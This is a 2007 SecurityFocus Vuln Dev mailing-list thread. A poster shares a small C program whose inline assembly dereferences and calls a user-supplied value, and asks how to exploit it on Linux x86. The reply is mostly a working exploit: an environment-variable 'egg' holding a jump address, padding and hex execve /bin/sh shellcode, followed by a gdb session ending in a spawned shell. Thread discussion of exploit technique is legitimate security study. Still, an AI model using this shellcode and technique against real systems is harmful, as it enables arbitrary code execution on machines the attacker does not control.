Vuln Dev
Exotic vulnerability Jun 26 2007 06:23PM
joxeankoret (joxeankoret yahoo es) (1 replies)
Re: Exotic vulnerability Jun 28 2007 09:24AM
Thomas Pollet (thomas pollet gmail com)
Hello,

On 26/06/07, joxeankoret <joxeankoret (at) yahoo (dot) es [email concealed]> wrote:
>
> Hi,
>
> I'm trying to develop an exploit for a product in which I found a
> vulnerability and that is the most "exotic" one I found. The following C
> source recreates the vulnerability:
>
> #include <stdio.h>
>
> void func(int var)
> {
> __asm__("mov (%eax), %eax");
> __asm__("call *%eax");
>
> return;
> }
>
>
> int main(int argc, char *argv[])
> {
> int i;
>
> printf("Value is 0x%x\n", atoi(argv[1]));
> i = atoi(argv[1]);
> func(i);
> }
>
> When the process calls the function "func" EAX has the value stored in the
> variable "i", next the process makes the call "mov (%eax), %eax" and next
> calls %eax. I have not be found a way to exploit it.
>
> Any ideas in how can be exploited to execute arbitrary code? BTW, I'm trying
> to exploit it under Linux x86.
>
> Thanks!
> Joxean Koret

$ export EGG=$(
echo -en "\x9b\xe5\xff\x3f"; #the address that will be called (into
nop sled on the stack)
perl -e 'print "A"x4996'; #nops
echo -e "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf
3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xf
f\xff\xff/bin/sh"
#shellcode )

$ gdb -q ./v
(gdb) break main
Breakpoint 1 at 0x8048383
(gdb) r 1073735062
Starting program: /home/build/v 1073735062

Breakpoint 1, 0x08048383 in main ()
(gdb) x/20x 0x3fffe596
0x3fffe596: 0x3fffe59b 0x41414141 0x41414141 0x41414141
0x3fffe5a6: 0x41414141 0x41414141 0x41414141 0x41414141
0x3fffe5b6: 0x41414141 0x41414141 0x41414141 0x41414141
0x3fffe5c6: 0x41414141 0x41414141 0x41414141 0x41414141
0x3fffe5d6: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) del 1
(gdb) c
Continuing.
Value is 0x3fffe596

Program received signal SIGTRAP, Trace/breakpoint trap.
0x15556a70 in _start () from /lib/ld-linux.so.2
(gdb)
Continuing.
sh-2.05b$

Btw, eax holds the return value of atoi regardless.

Regards,
Thomas Pollet

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus